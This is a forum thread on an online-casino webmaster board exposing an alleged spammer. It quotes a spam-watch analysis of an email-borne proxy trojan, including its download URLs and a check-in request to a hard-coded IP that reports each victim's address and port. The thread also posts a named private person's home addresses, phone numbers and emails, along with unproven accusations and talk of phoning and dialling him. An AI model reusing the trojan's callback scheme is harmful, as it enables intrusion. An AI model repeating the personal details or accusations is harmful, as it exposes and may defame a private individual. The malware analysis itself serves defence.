Evil spammer

dominique

Dormant account
I am not quite sure if this thread belongs here. I am sure it can be moved.

This guy is a big time spammer.

Someone at a webmaster board exposed him and he read it.

Next thing he bombs the person who complained with bounced spam - tons

of it. He used their address as the sender and sent out his spam and

they got all the bounces.

Now here is some more info on this person, and it makes your hair

stand on end. I am likely going to be targeted for publishing this,

but I will not have someone like that intimidate everyone.

He is also linked to deploying trojans.


Jeroen Puttemans
+32.23057068
Platanenlaan 15Perk, BRABANT 1820
BELGIUM

And if in any doubt have a look at this project on Scriptlance for a

mailer with proxy support (we all know what they are used for don't

we?):
You do not have permission to view link Log in or register now.


That or something like it is what he uses.

He apparently owns this:

Address: Platanenlaan 15, 1820, Perk Belgium Europe
Office: +32 477 99-4283
Fax:
Email: support@casinowebmarketing.com
ICQ: 123226511



Type: Trojan (lures you to a website to be infected by a trojan)
Domain(s)/IP Address(es) used: hotwincasino.com (WHOIS) (DNS)
Exact Link: http://www.hotwincasino.com/page.php
Email's Originating Network(s): Sjrb.ca (Canadian Network)
Danger Level: Medium

Description

Yes another spammed out trojan but this time some what different to

the most recent ones, mostly in that it does not appear to be a

keylogger at alll. We received an email early this morning with the

subject of:

YOU WON A FREE VACATION

The email also appeared to have no body. It was simply an empty email

that scrolled for a fair way. Being suspicous of this we had a peek at

the source of the email. We were not to terribly surprised to find

that even though the email displayed nothing in the body there was a

line, right down the bottom that read:

object data="xhttp://www.hotwincasino.com/page.php" width="14" height

="14"

A we've mentioned many times before, the OBJECT tag is a method of

embedding other content into a HTML page. In this case it fetches and

tries to open:

xhttp://www.hotwincasino.com/page.php

We fetched a copy of this page to investigate further. Again we were

not surprised to find the page was a HTA (HTML Application) which is

basically a very powerful way of allowing web pages interact with

Windows systems. At present we don't have a full idea of how this one

works. We know that it calls the file:

xhttp://www.hotwincasino.com/mstasks.exe

In order to do something with it but this time the spammers have been

clever and used an ecoding function of VBScript to make the code

unreadable to humans. Being non-programmers ourselves we are unsure

how to go about decoding this script. If there are any VBScript people

out there who would like to give the code a look over (remember it is

viral so be careful) there is a copy in the zipe file below.

We downloaded the mstasks.exe file from the site (not to be confused

with the Windows file mstask.exe) and ran strings across it in order

to extract any plain text that might give us some clues. This first

pass was not very succesful and we only ended up with some information

that confirmed that it appeared to hook into various components of

Windows networking.

In order to find out more, we once again set up our VMware (virtual

machine) with a victim Windows 2000 operating system. Internal

monitoring was set up using the free utilies from Sysinternals who

make some very good tools, highly recommended for forensics work on

Windows machines. External network monitoring was set up on our Linux

gateway.

Once this was set up we loaded up the page the email used and sat back

to watch what happened. Well the good news is that the intial

infection phase doesn't appear to work to well. Our Windows 2000 set

up is totally unpatched but Internet Explorer did actually ask us if

we wanted to save or execute the code being sucked down. This should

tip most people off to something being wrong and cancelling the

transaction. However since we don't have other systems to test,

perhaps other versions of Windows do execute the code without asking.

Either way, once the code is executed a small blank window pops up.

Nothing inside it. However in the background there is some serious

work happening. From what we can tell the contents of mstasks.exe are

downloaded and then executed on the machine. This creates a number of

files. We found that in the C:\ directory there were two new

executable files:

y.exe
x.exe

We also found the in the C:\WINNT\system32\ directory there was a file

called:

scchost.exe

Notice again how the spammers have tried to make the file name similar

to a real Windows file in the same directory (svchost.exe). We found

that this file was now also running as a full time process in the

background. After about 30 seconds another executable was created in

the same directory this time called:

scchostc.exe

This was also started as a full time process (as a child of scchost.

exe) and began to listen on a port. Later on we found that this port

was choosen at random each time the trojan started up. For example

some of the ports we saw being used:

40627
12052
36890

After this point the trojan appeared to simply sit there and await

instructions. After probing the open port for a bit we came to the

conclusion that it was a proxy server. At around this time we also

noticed some network traffic from the machine. First there was a call

from the machine to the site:

http://www.ip2location.com/map.asp

Which is a legitimate web site that simply reports back where your

request is coming from and if you are behind a proxy server. This is

used by the trojan to obtain the machines real IP address for the next

phase.

The next phase is then to send a request that says:

xhttp://216.52.184.239/command.php?IP=<victim's IP address>&Port=<port

number proxy is listening on>

Once this is done the remote server starts sending back a steady

stream of what look like web site fetch requests. However since we're

not super savy with these we are unable to tell completly.

Basically what we have here is a clever little proxy trojan that the

spammers could easily use for a number of things. Making anonymous web

requests, sending out spam, attacking other machines on the internet

and the fact it reports back to base to keep the spammers up to date

is quite handy for them as they don't have to bother probing to see

which machines are infected.

Having watched the infection in action we then decided to turn our

attention back to the executable files. After some more probing we

found that several of the files had been packed with UPX and that was

why we were getting very little information out of them. We ran the

UPX unpacker across the following files:

mstasks.exe
scchostc.exe
y.exe

The other files we found not be packed with UPX. Once all the files

were unpacked we ran strings across them and came out with some

interesting results:



mstasks.exe - The intial infection file. Creates scchost.exe and

scchostc.exe. Also adds registery entries to ensure trojan starts at

boot time. Also seems to contain the packed components of the other

files

x.exe - Seems to be a left over from the trojan install. Seems to just

download mstasks.exe and save it to y.exe

y.exe - A duplicate of mstasks.exe

scchost.exe - Trojan start up file. Sets up trojan environment,

intialses scchostc.exe and finds out victim machines IP address using

the above stated method.

scchostc.exe - The proxy part of the trojan. Turns out to be a copy of

a legitimate proxy software known as 3Proxy. It appears trojan writers

have used this before as many anti-virus scanners detect it as

Backdoor.Daemonize


It is important to note this is not a worm or a virus. It is not self

propating. That was purposefully sent out by the spammers, as a bulk

email in order to get people infected with this trojan.

Now we knew what the trojan did, we turned back to where the trojan

came from. We had a look at the top level for the site and found that

it was nothing more than an empty place holder. We also found the

files are being hosted on Yahoo! servers. We will contact Yahoo!

shortly and inform them of this breach of the AUP and hopefully get

the viral files quickly pulled down. We also found that where the

trojan is reporting back to appears to be linked with this domain:

playthehouse.com - (WHOIS) (DNS)

This link is strengthend, for when we check the apparenet registrants

for both domains we find the same person:

Jeroen Puttemans

It appears that the he is heavily involved with online casino's and

given what we are seeing today is not above stopping to using trojaned

machines to do some dirty work for him.

Extra Information

Copy of the email - Due to the fact that Interent Explorer has a habit

of trying to execute HTML code even when a file is marked as plain

text, we will not be placing a copy of the email here until the sites

are confirmed to have been taken down. A copy of the email will be in

the zip file

Strings of mstasks.exe - Before unpacking

Strings of mstasks.exe - After unpacking

Strings of x.exe - No unpacking needed

Strings of y.exe - Before unpacking

Strings of y.exe - After unpacking

Strings of scchost.exe - No unpacking needed

Strings of scchostc.exe - Before unpacking

Strings of scchostc.exe - After unpacking

Screen shot of Internet Explorer prompting to execute or download the

trojan

Screen shot of the window that pops up in the user chooses to execute

it

Screen shot showing scchost.exe running in the background

Screen shot showing the prescence of x.exe and y.exe

Screen shot showing scchostc.exe being started as a child of scchost.

exe

Screen shot showing scchostc.exe listening on a random port - In this

case port 12052

WARNING

Some of the files contained in the following zip file are viral in

nature. As such we only recommend those who know what they are doing

download the file. Code Fish Spam Watch will not take responsibility

if this warning is ignored and your machine is infected.

Copy of trojan site and other details - Contained within a passworded

zip file. Password "trojan" but without quotes.

Log of further activity

7:15 9/3/04 - Domain still fully active. Going to try and find another

way to contact Yahoo!

And more:
You do not have permission to view link Log in or register now.


And he sells credit card info:
You do not have permission to view link Log in or register now.


You do not have permission to view link Log in or register now.




And it gets worse....what a lowlife scumbag!

You do not have permission to view link Log in or register now.



WARNING

If you have been sent to this website by a person calling himself

'godmailer', or using the following contact details, you are being

ripped off. The product functionality that he describes is inaccurate

and not included in our releases.

Jeroen Puttemans (webmaster@turnkeycasino.net)
+32.23057068
Platanenlaan 15
Perk, Brabant 1820
BE

Martin Puttemans (webmaster@turnkeycasino.net)
+32.477994283
Vinkreed 4
Osmod, BRABANT 1820
BE

ICQ: 123226511

He is offering to sell our product for between $300 and $500 USD. We

have determined that he has obtained an early version of our product

(REL-0.6) which is severely outdated and functionally incomplete. We

have complete logs of his intrustion attempts over the past 2 months

and authorities have been contacted.

We have removed all product information and documentation in the

interim.

If you have already purchased a copy of our software from the above

mentioned person please contact us at sales@cleanmailer.com, all

information will be treated in the strictest of confidence.

I hope someone will tell him to cut it out. If you speak up against

him he goes after you. I don't think someone like that should be

allowed to intimidate an entire section of the industry!
 
Last edited by a moderator:

deaning

Dormant account
Ellen and I are the targets.


Ellen and I have been targeted by a spammer since she placed a complaint with Wager Share about repeated spam from an apparent affiliate after many months of trying to unsubscribe. After a post at CAP about it (he obviously reads the posts there) she received over 22k of bounced emails with her as the sender and reply address.

Not being too bright about it, with some help we found out who he is. I then became a target with these 2 emails being sent out to who knows how many people with myself as the sender and reply to addy:

Subject: CLICK YES TO WIN A NEW CAR!!

I would hope you'll stop this jerk <http://www.pokerpokerandmorepoker.com> ,
makes online gambling look so bad



if I was a player I would NEVER play here
<http://www.pokerpokerandmorepoker.com>

Just in:

Subject: I'm a crook. Read about me on my site

I would hope you'll stop me <http://www.pokerpokerandmorepoker.com> , making
online gambling looking so bad
Me and my husband, Dean, are most stupid people in the online casino
marketing.


We just idiots!

I have since discovered the perpetrator has:
Installed trojans from a website to people lured there
Stolen beta mailing software from a company and resold it

I phoned the prat yesterday and it appears he is not prepared to desist.

Well, I am not easily intimidated. You picked the wrong guy. You will be exposed as the garbage you are.


Jeroen Puttermans was installing trojans via xwww.hotwincasino.com.
You do not have permission to view link Log in or register now.


Has sold or attempted to sell player and credit card details at CAP, Startcasino and WOL that I know of.
You do not have permission to view link Log in or register now.


We're exclusive broker for 12 online casinos that sell their properties.
Each of casino has about 2,700 real players accounts and they offer
for sale their email addresses.

Contact us on our email market2casino@yahoo.com

Who comes first gets a priority.
Stole beta mailing software and was reselling at inflated prices.
You do not have permission to view link Log in or register now.



WARNING

If you have been sent to this website by a person calling himself 'godmailer', or using the following contact details, you are being ripped off. The product functionality that he describes is inaccurate and not included in our releases.

Jeroen Puttemans (webmaster@turnkeycasino.net)
+32.23057068
Platanenlaan 15
Perk, Brabant 1820
BE

Martin Puttemans (webmaster@turnkeycasino.net)
+32.477994283
Vinkreed 4
Osmod, BRABANT 1820
BE

ICQ: 123226511

He is offering to sell our product for between $300 and $500 USD. We have determined that he has obtained an early version of our product (REL-0.6) which is severely outdated and functionally incomplete. We have complete logs of his intrustion attempts over the past 2 months and authorities have been contacted.

We have removed all product information and documentation in the interim.

If you have already purchased a copy of our software from the above mentioned person please contact us at sales@cleanmailer.com, all information will be treated in the strictest of confidence.
He also owns:
playthehouse.com (since closed)
hotwincasino.com (yahoo has removed)
turnkeycasino.net
casinowebmarketing.com (rents out spam lists)
market2casino@yahoo.com (used to sell player information)

Consistent spam is sent by him as Casino Bonus and the unsubscribe links are duds.

project on Scriptlance for a mailer with proxy support (we all know what they are used for don't we?):
You do not have permission to view link Log in or register now.



Made the following post at 7seascasino.com:

Almost all "players" (I mean casino vendors, forum owners, gambling portals webmasters) in this industry are crooks and thieves. I don't believe you'll ever see even one dime from Futurebet or whatever they call themselves. You waste your time by informing people how bad futurebet is. You only help Marc Lesnik (the biggest crook out there) to

gain more money from futurebet for removing your posting from his crooked forum. The same is true for crooks from winneronline, etc. Trust this helps you.
Michael <market2casino@yahoo.com>
USA - Sunday, May 04, 2003 at 15:18:44 (PDT)
Also a quick search at google:
You do not have permission to view link Log in or register now.
 

jpm

Dormant account
Dominique, you should remove or at least break up that hotwincasino URL in your message. If anyone clicks on it and doesn't have the kind of virtual armor I have on my computer, they will be infected instantly.

DON'T CLICK ON THE HOTWINCASINO LINKS IN THIS THREAD, YOUR MACHINE WILL BE INFECTED!
 

jetset

RIP Brian
CAG
Good advice, JPM.

This guy was a frequent spam poster at WOL a couple years back - he has clearly *progressed* since then. Are there any European authorities who might be interested in his behaviour?
 

Casinomeister

Forum Cheermeister
Staff member
This Jeroen Puttemans is the dick breath who "joe jobbed" me and the Professor last November. This was after I published an article in my newsletter that tied this a-hole in with 1CNP.
http://www.casinomeister.com/newsletter/2003/6nov2003.html#1cnp

I believe he has a very small penis. This is why he uses the Internet to give himself a feigned sense of power. He is a malicious little baby.
 

Casinomeister

Forum Cheermeister
Staff member
And hi Deaning!

Welcome back!
 

jetset

RIP Brian
CAG
Looking at the history of this creep Puttemans I would suggest he should learn to spell "I N T E R P O L" - soon.

Edit - typos
 

dominique

Dormant account
jpm said:
Dominique, you should remove or at least break up that hotwincasino URL in your message. If anyone clicks on it and doesn't have the kind of virtual armor I have on my computer, they will be infected instantly.

DON'T CLICK ON THE HOTWINCASINO LINKS IN THIS THREAD, YOUR MACHINE WILL BE INFECTED!

I would love to disable them, but I think I am too late to edit - I can't do it.

Maybe the Meister can do it. Thanks and sorry.

Also, if this is the guy from 1cnp, then the credit card details he is selling are those of 1cnp players. Probably their addresses is what he also sells at his site.
 
Last edited:

deaning

Dormant account
1cnp? Geez.

Time to wake up the dopey *&^& person again..
3223057068 belgium

He doesn't know what I am talking about.

Silly, silly person.

I called and was told if I want to unsubscribe to click the unsubscribe link on the email.

He then hung up. I called again.

I then told him I was the Dean Ing he was targeting.

He hung up again.

The phone goes unanswered...

Welll if you have ever been spammed and want to talk to a real live example...give old Jeroen a call!
 
Last edited:

jpm

Dormant account
I think that if I were getting spammed by this dickless wonder, I would set my modem to dial him up at all times of the day and night until he is forced to change his number. If I were malicious that is ;-)
 

deaning

Dormant account
Hiya Meister!

The hotwin site is no longer active...yahoo has taken it down, but still don't go there and if you have, run ad aware just to be safe.

Well he aint going to give up and has had fair warning. I will utilise every means at my disposal (legal).

Today he has emailed all the aff programs and a lot of webmasters.

Now, this also is supposedly from Ellen to all the people that MAY have done business with his shonky casinowebmarketing site. That's not too bright is it?

I don't really have to do much at all, he is doing himself in admirably! :):):)

Glad I have cheap international rates. :)
 

dominique

Dormant account
There are more attacks on Dean and Ellen - I am sure some of you have received those mails. They appear to come from Dean and Ellen but are his.

All of you who got this mail - you are on this guys spam list.

Currently he is attacking a second person - a good friend of yours, Brian!

This has to stop. Grrrrrrr
 

deaning

Dormant account
Yes, it appears he has decided to send to all 12 million names he claims to have...

Well, I won't rest until he has not 1 account left.
 
Top